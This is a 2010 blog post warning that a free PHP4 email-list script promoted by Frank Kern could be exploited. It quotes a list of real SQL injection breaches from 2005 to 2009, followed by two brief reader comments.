« 1938 Killinger & Freund Frontwheel Drive Motorbike | Main | Fat Bastard on AA Plane »

Frank Kern "List Machine" Potential PHP4 Exploit Disaster 

Frank Kern is about to release his latest product "List Control". Part of the pre-launch promotion has seen him offering a free script - "List Machine" to help people build their email list. BUT and it's a big BUT (ha ha). The script his programmers have used is PHP4 which is vulnerable to exploitation - attack by phishers and scammers. Apparently they used PHP4 because Frank wanted to use it on BlueHost which he feels is newbie-friendly. Here - read the Wiki on PHP Exploits - here's an extract on what can happen -
* On November 1, 2005, a high school student used a SQL injection to break into the site of a Taiwanese information security magazine from the Tech Target group and steal customers' information. * On January 13, 2006, Russian computer criminals broke into a Rhode Island government web site and allegedly stole credit card data from individuals who have done business online with state agencies. * On March 29, 2006, Susam Pal discovered a SQL injection flaw in an official Indian government tourism site. * On March 2, 2007, Sebastian Bauer discovered a SQL injection flaw in the knorr.de login page. * On June 29, 2007, a computer criminal defaced the Microsoft U.K. website using SQL injection. . U.K. website The Register quoted a Microsoft spokesperson acknowledging the problem. * In January 2008, tens of thousands of PCs were infected by an automated SQL injection attack that exploited a vulnerability in application code that uses Microsoft SQL Server as the database store. * On April 13, 2008, the Sexual and Violent Offender Registry of Oklahoma shut down its website for 'routine maintenance' after being informed that 10,597 Social Security numbers from sex offenders had been downloaded via a SQL injection attack. * In May 2008, a server farm inside China used automated queries to Google's search engine to identify SQL server websites which were vulnerable to the attack of an automated SQL injection tool. * In July 2008, Kaspersky's Malaysian site was broken into by a Turkish computer criminal going by the handle of "m0sted", who claimed to have used SQL injection. * In 2008,at least April through August, a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL Server database server. The attack doesn't require guessing the name of a table or column, and corrupts all text columns in all tables in a single request. A HTML string that references a malware JavaScript file is appended to each value. When that database value is later displayed to a website visitor, the script attempts several approaches at gaining control over a visitor's system. The number of exploited web pages is estimated at 500,000 * On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack. In reportedly "the biggest case of identity theft in American history", the man stole cards from a number of corporate victims after researching their payment processing systems. Among the companies hit were credit card processor Heartland Payment Systems, convenience store chain 7-Eleven, and supermarket chain Hannaford Brothers. * In December 2009, an attacker breached a RockYou! plaintext database containing the unencrypted usernames and passwords of about 32 million users by using a SQL injection attack.
I'm happy to report that I've helped Frank avoid his very own Toyota sticking accelerator disaster. Just imagine what could have happened. This could have blown up in his face BIG TIME. Read more about it here on The Warrior Forum where I post under my moniker "Metronicity".

PrintView Printer Friendly Version

EmailEmail Article to Friend

Reader Comments (2)

They wacked the post
March 18, 2010 | Unregistered CommenterJarret
Yeah...happens all the time on that stupid forum. C'est la vie. Usually happens if people start fighting.
March 18, 2010 | Registered CommenterMalcolm Lambe

PostPost a New Comment

Enter your information below to add a new comment.
Author Email (optional):
Author URL (optional):
All HTML will be escaped. Hyperlinks will be created for URLs automatically.